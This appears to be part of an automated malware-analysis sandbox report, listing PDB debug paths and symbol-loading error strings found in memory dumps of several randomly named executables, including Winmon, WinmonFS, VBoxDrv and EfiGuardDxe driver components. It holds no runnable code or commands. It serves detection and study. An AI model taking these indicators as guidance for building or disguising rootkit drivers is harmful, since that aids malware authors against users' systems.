                  Source: Binary string: symsrv.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000C7A000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000003619000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000C7A000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003689000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003639000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000C7A000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000003529000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000C7A000.00000040.00000001.01000000.00000011.sdmp
                  Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Unable to locate the .pdb file in this location source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: The module signature does not match with .pdb signature. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: .pdb.dbg source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: '(EfiGuardDxe.pdbx source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: symsrv.pdbGCTL source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000C7A000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000003619000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000C7A000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003689000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003639000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000C7A000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000003529000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000C7A000.00000040.00000001.01000000.00000011.sdmp
                  Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: or you do not have access permission to the .pdb location. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
